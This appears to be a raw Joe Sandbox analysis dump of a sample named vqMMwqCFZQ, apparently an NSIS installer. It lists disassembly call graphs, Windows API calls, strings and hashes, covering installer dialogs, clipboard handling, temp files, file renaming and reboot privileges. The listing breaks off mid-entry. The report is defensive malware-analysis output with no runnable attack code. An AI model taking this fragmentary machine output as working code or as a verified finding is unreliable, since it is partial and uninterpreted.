5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 
5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                          Control-flow Graph

                                          control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                          • GetClientRect.USER32(?,?), ref: 00405196
                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                          • ShowWindow.USER32(00000008), ref: 00405333
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                          • CreatePopupMenu.USER32 ref: 00405376
                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                          • EmptyClipboard.USER32 ref: 00405411
                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                          • CloseClipboard.USER32 ref: 0040546E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                          • String ID: @rD$New install of "%s" to "%s"${
                                          • API String ID: 2110491804-2409696222
                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                          APIs
                                          • #17.COMCTL32 ref: 004038A2
                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                          • API String ID: 2435955865-239407132
                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                          APIs
                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                          • ShowWindow.USER32(?), ref: 004054D2
                                          • DestroyWindow.USER32 ref: 004054E6
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                          • EnableWindow.USER32(?,?), ref: 00405757
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID: @rD
                                          • API String ID: 3282139019-3814967855
                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                          APIs
                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                          • ShowWindow.USER32(?), ref: 00401753
                                          • ShowWindow.USER32(?), ref: 00401767
                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                          Strings
                                          • Rename: %s, xrefs: 004018F8
                                          • Rename on reboot: %s, xrefs: 00401943
                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                          • SetFileAttributes failed., xrefs: 004017A1
                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                          • BringToFront, xrefs: 004016BD
                                          • Sleep(%d), xrefs: 0040169D
                                          • detailprint: %s, xrefs: 00401679
                                          • Call: %d, xrefs: 0040165A
                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                          • Rename failed: %s, xrefs: 0040194B
                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                          • Aborting: "%s", xrefs: 0040161D
                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                          • Jump: %d, xrefs: 00401602
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                          • API String ID: 2872004960-3619442763
                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                          • API String ID: 608394941-1650083594
                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • lstrcatW.KERNEL32(00000000,00000000,BasicsCommunication,004CB0B0,00000000,00000000), ref: 00401A76
                                          • CompareFileTime.KERNEL32(-00000014,?,BasicsCommunication,BasicsCommunication,00000000,00000000,BasicsCommunication,004CB0B0,00000000,00000000), ref: 00401AA0
